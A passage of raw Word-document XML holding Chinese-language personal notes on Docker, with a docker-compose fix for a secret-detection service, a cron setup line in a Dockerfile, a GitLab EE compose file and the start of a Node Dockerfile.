        <w:t>ocker-compose</w:t>
      </w:r>
      <w:bookmarkEnd w:id="136"/>
    </w:p>
    <w:p w14:paraId="4B6654B0" w14:textId="27C7FF2E" w:rsidR="001C0634" w:rsidRDefault="001C0634" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E956273" w14:textId="647D427E" w:rsidR="004D639F" w:rsidRDefault="004D639F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>ntrypoint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不好用，我查阅资料说是类似于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Dockerfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RUN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，在容器启动之前的构件中会运行，但是怎么测试都不对。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346CB5EA" w14:textId="4681ED9E" w:rsidR="004D639F" w:rsidRDefault="004D639F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>干脆把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RUN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的命令写到最后的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构建命令中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01859527" w14:textId="29287C0A" w:rsidR="002634A1" w:rsidRPr="00AB43A1" w:rsidRDefault="00AB43A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB43A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="darkBlue"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>涉及</w:t>
      </w:r>
      <w:r w:rsidR="002634A1" w:rsidRPr="00AB43A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="darkBlue"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>command</w:t>
      </w:r>
      <w:r w:rsidR="002634A1" w:rsidRPr="00AB43A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="darkBlue"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>命令，注意使用</w:t>
      </w:r>
      <w:r w:rsidR="002634A1" w:rsidRPr="00AB43A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="darkBlue"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="002634A1" w:rsidRPr="00AB43A1">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="darkBlue"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ocker-compose logs</w:t>
      </w:r>
      <w:r w:rsidR="002634A1" w:rsidRPr="00AB43A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="darkBlue"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>看日志，有可能无限重复运行</w:t>
      </w:r>
      <w:r w:rsidR="002634A1" w:rsidRPr="00AB43A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="darkBlue"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>command</w:t>
      </w:r>
      <w:r w:rsidR="002634A1" w:rsidRPr="00AB43A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="darkBlue"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A33444" w14:textId="77777777" w:rsidR="004D639F" w:rsidRDefault="004D639F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41CB14B7" w14:textId="77777777" w:rsidR="004E2B19" w:rsidRDefault="004E2B19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>version: "3"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E6798A" w14:textId="77777777" w:rsidR="004E2B19" w:rsidRDefault="004E2B19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D15A6D" w14:textId="77777777" w:rsidR="004E2B19" w:rsidRDefault="004E2B19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  secretdetection_docker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648709BF" w14:textId="77777777" w:rsidR="004E2B19" w:rsidRDefault="004E2B19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    image: amd64/alpine:3.14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8DD1DC" w14:textId="77777777" w:rsidR="004E2B19" w:rsidRPr="002D7DE3" w:rsidRDefault="004E2B19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="002D7DE3">
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t># entrypoint: ["/secretDetection/entrypoint.sh"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB8A6DB" w14:textId="77777777" w:rsidR="004E2B19" w:rsidRDefault="004E2B19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002D7DE3">
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t xml:space="preserve">    # entrypoint: "/bin/sh -c "apk update &amp;&amp; apk add git &amp;&amp; apk add tzdata &amp;&amp; cp /usr/share/zoneinfo/Asia/Shanghai /etc/localtime &amp;&amp; echo "Asia/Shanghai" &gt; /etc/timezone &amp;&amp; apk del tzdata"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E619C5" w14:textId="77777777" w:rsidR="004E2B19" w:rsidRDefault="004E2B19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    container_name: secret_detection_http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7757EF" w14:textId="77777777" w:rsidR="004E2B19" w:rsidRDefault="004E2B19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53753C99" w14:textId="77777777" w:rsidR="004E2B19" w:rsidRDefault="004E2B19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      - "8000:8000"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A28C14" w14:textId="77777777" w:rsidR="004E2B19" w:rsidRDefault="004E2B19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    restart: always</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE4B495" w14:textId="77777777" w:rsidR="004E2B19" w:rsidRDefault="004E2B19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    volumes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F07F62" w14:textId="77777777" w:rsidR="004E2B19" w:rsidRDefault="004E2B19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      - ./SecretDetectionDir:/secretDetection/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A53C8D7" w14:textId="77777777" w:rsidR="004E2B19" w:rsidRDefault="004E2B19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    restart: always</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4CABB6" w14:textId="77777777" w:rsidR="004E2B19" w:rsidRDefault="004E2B19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    working_dir: /secretDetection/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17642329" w14:textId="77777777" w:rsidR="004E2B19" w:rsidRDefault="004E2B19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # command: /secretDetection/http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A59EA7" w14:textId="77777777" w:rsidR="004E2B19" w:rsidRDefault="004E2B19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="004D639F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>command: /bin/sh -c "apk update &amp;&amp; apk add git &amp;&amp; apk add tzdata &amp;&amp; cp /usr/share/zoneinfo/Asia/Shanghai /etc/localtime &amp;&amp; echo "Asia/Shanghai" &gt; /etc/timezone &amp;&amp; apk del tzdata &amp;&amp; /secretDetection/http"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7640B7D2" w14:textId="27C466CE" w:rsidR="00F704AC" w:rsidRDefault="004E2B19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E60AABE" w14:textId="1D831756" w:rsidR="00F704AC" w:rsidRDefault="00F704AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49230FB0" w14:textId="611DBDC9" w:rsidR="00F704AC" w:rsidRDefault="00F704AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D06A29B" w14:textId="1299054E" w:rsidR="00F704AC" w:rsidRDefault="00F704AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="136D3185" w14:textId="3F21673A" w:rsidR="00F704AC" w:rsidRDefault="00C70975" w:rsidP="00C70975">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>crontab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重启无效</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B461F1" w14:textId="77777777" w:rsidR="00C70975" w:rsidRDefault="00C70975" w:rsidP="00C70975"/>
    <w:p w14:paraId="0781DF8F" w14:textId="77777777" w:rsidR="00C951BC" w:rsidRPr="00C951BC" w:rsidRDefault="00C951BC" w:rsidP="00C951BC">
      <w:r w:rsidRPr="00C951BC">
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00C951BC">
        <w:t>防破解</w:t>
      </w:r>
      <w:r w:rsidRPr="00C951BC">
        <w:t xml:space="preserve"> crontab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6A1571" w14:textId="77777777" w:rsidR="00C951BC" w:rsidRPr="00C951BC" w:rsidRDefault="00C951BC" w:rsidP="00C951BC">
      <w:r w:rsidRPr="00C951BC">
        <w:t xml:space="preserve"> RUN echo "* * * * * root cd /app/scripts/;/usr/local/bin/python /app/scripts/timer_add.py &gt;&gt; /var/log/timer.log 2&gt;&amp;1" &gt;&gt; /etc/cron.d/crontab &amp;&amp; chmod 0644 /etc/cron.d/crontab &amp;&amp; /etc/init.d/cron restart &amp;&amp; /etc/init.d/cron status &amp;&amp; chmod +x /app/start.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DDC5B7" w14:textId="77777777" w:rsidR="00C70975" w:rsidRPr="00C951BC" w:rsidRDefault="00C70975" w:rsidP="00C70975"/>
    <w:p w14:paraId="067024D2" w14:textId="77777777" w:rsidR="00C70975" w:rsidRPr="00C70975" w:rsidRDefault="00C70975" w:rsidP="00C70975"/>
    <w:p w14:paraId="536AA24D" w14:textId="77777777" w:rsidR="00C70975" w:rsidRDefault="00C70975" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27C26999" w14:textId="77777777" w:rsidR="00C70975" w:rsidRDefault="00C70975" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39A660FF" w14:textId="77777777" w:rsidR="00F704AC" w:rsidRDefault="00F704AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DE19006" w14:textId="675F5035" w:rsidR="00360B8E" w:rsidRDefault="00360B8E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="137" w:name="_Toc159779598"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dockerf</w:t>
      </w:r>
      <w:r>
        <w:t>ile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gitlab</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>EE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例</w:t>
      </w:r>
      <w:bookmarkEnd w:id="137"/>
    </w:p>
    <w:p w14:paraId="015F3809" w14:textId="77777777" w:rsidR="00360B8E" w:rsidRDefault="00360B8E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77FB176D" w14:textId="77777777" w:rsidR="003463F9" w:rsidRDefault="003463F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>version: '3.8'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BEA290" w14:textId="77777777" w:rsidR="003463F9" w:rsidRDefault="003463F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A6F52CC" w14:textId="77777777" w:rsidR="003463F9" w:rsidRDefault="003463F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC7FF8C" w14:textId="77777777" w:rsidR="003463F9" w:rsidRDefault="003463F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  gitlab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A39AD6" w14:textId="77777777" w:rsidR="003463F9" w:rsidRDefault="003463F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    image: 'gitlab/gitlab-ee:15.3.5-ee.0'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0978030D" w14:textId="77777777" w:rsidR="003463F9" w:rsidRDefault="003463F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    container_name: 'gitlab-ee'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C19AE36" w14:textId="77777777" w:rsidR="003463F9" w:rsidRDefault="003463F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    restart: always</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603D3910" w14:textId="77777777" w:rsidR="003463F9" w:rsidRDefault="003463F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    hostname: 192.168.3.199</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C306C9" w14:textId="77777777" w:rsidR="003463F9" w:rsidRDefault="003463F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    privileged: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE81D0A" w14:textId="77777777" w:rsidR="003463F9" w:rsidRDefault="003463F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    shm_size: '2gb'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AF088A" w14:textId="77777777" w:rsidR="003463F9" w:rsidRDefault="003463F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    environment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E74C03" w14:textId="77777777" w:rsidR="003463F9" w:rsidRDefault="003463F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      GITLAB_OMNIBUS_CONFIG: |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5BB334" w14:textId="77777777" w:rsidR="003463F9" w:rsidRDefault="003463F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        external_url 'http://192.168.3.199:40080'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F6C0DB" w14:textId="77777777" w:rsidR="003463F9" w:rsidRDefault="003463F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        gitlab_rails['gitlab_shell_ssh_port'] = 40022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00519224" w14:textId="77777777" w:rsidR="003463F9" w:rsidRDefault="003463F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546016DD" w14:textId="77777777" w:rsidR="003463F9" w:rsidRDefault="003463F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      - 40080:40080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055A0770" w14:textId="77777777" w:rsidR="003463F9" w:rsidRDefault="003463F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      - 40443:40443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DC0BCE" w14:textId="77777777" w:rsidR="003463F9" w:rsidRDefault="003463F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      - "40022:22"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BDDFEA" w14:textId="77777777" w:rsidR="003463F9" w:rsidRDefault="003463F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    volumes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4443D412" w14:textId="77777777" w:rsidR="003463F9" w:rsidRDefault="003463F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      - './storage/config:/etc/gitlab'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792B9BFD" w14:textId="77777777" w:rsidR="003463F9" w:rsidRDefault="003463F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      - './storage/logs:/var/log/gitlab'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190C36DE" w14:textId="77777777" w:rsidR="003463F9" w:rsidRDefault="003463F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      - './storage/data:/var/opt/gitlab'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684C2937" w14:textId="4CD61AA4" w:rsidR="00360B8E" w:rsidRPr="003463F9" w:rsidRDefault="00360B8E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CC8E27D" w14:textId="51A5B83D" w:rsidR="00360B8E" w:rsidRDefault="00360B8E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D99EC67" w14:textId="750F0900" w:rsidR="00360B8E" w:rsidRDefault="00360B8E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CD9402E" w14:textId="77777777" w:rsidR="00360B8E" w:rsidRDefault="00360B8E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11E39237" w14:textId="007B8339" w:rsidR="00EA490A" w:rsidRDefault="00EA490A" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="138" w:name="_Toc159779599"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>docker</w:t>
      </w:r>
      <w:r w:rsidR="00BA7626">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidR="00BA7626">
        <w:t>ile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00227608">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00227608">
        <w:t xml:space="preserve">ode 7.9 </w:t>
      </w:r>
      <w:r w:rsidR="00227608">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gitlab</w:t>
      </w:r>
      <w:r w:rsidR="00227608">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00227608">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CI</w:t>
      </w:r>
      <w:bookmarkEnd w:id="138"/>
    </w:p>
    <w:p w14:paraId="60A9C1DC" w14:textId="408F9FFC" w:rsidR="00EA490A" w:rsidRDefault="00EA490A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60F96149" w14:textId="13FF5A63" w:rsidR="00227608" w:rsidRDefault="00BA7626" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:t>ROM node</w:t>
      </w:r>
      <w:r w:rsidR="00CD253D">
        <w:t>:7.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463B3AB1" w14:textId="7BDD8AB2" w:rsidR="00CD253D" w:rsidRDefault="00F54BE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:t>ORKDIR /usr/src/app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1ECD97" w14:textId="77777777" w:rsidR="00F54BE4" w:rsidRDefault="00F54BE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19F4484B" w14:textId="42E9D54D" w:rsidR="00227608" w:rsidRDefault="00F54BE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>RG NODE_ENV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771DECF2" w14:textId="4B61380E" w:rsidR="00227608" w:rsidRDefault="00F54BE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:t>NV NODE_ENV $NODE_ENV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE5E3EA" w14:textId="321CC1CD" w:rsidR="00227608" w:rsidRDefault="00F54BE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>OPY package.json /usr/src/app/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54868431" w14:textId="52D0A864" w:rsidR="00227608" w:rsidRDefault="00F54BE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t>UN npm install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19687B0A" w14:textId="4BADBDD9" w:rsidR="00227608" w:rsidRPr="00227608" w:rsidRDefault="00F54BE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>OPY . /usr/src/app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF67C5F" w14:textId="2E0E37A2" w:rsidR="00EA490A" w:rsidRDefault="00EA490A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="727903B6" w14:textId="00E074E0" w:rsidR="00EA490A" w:rsidRDefault="00F54BE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
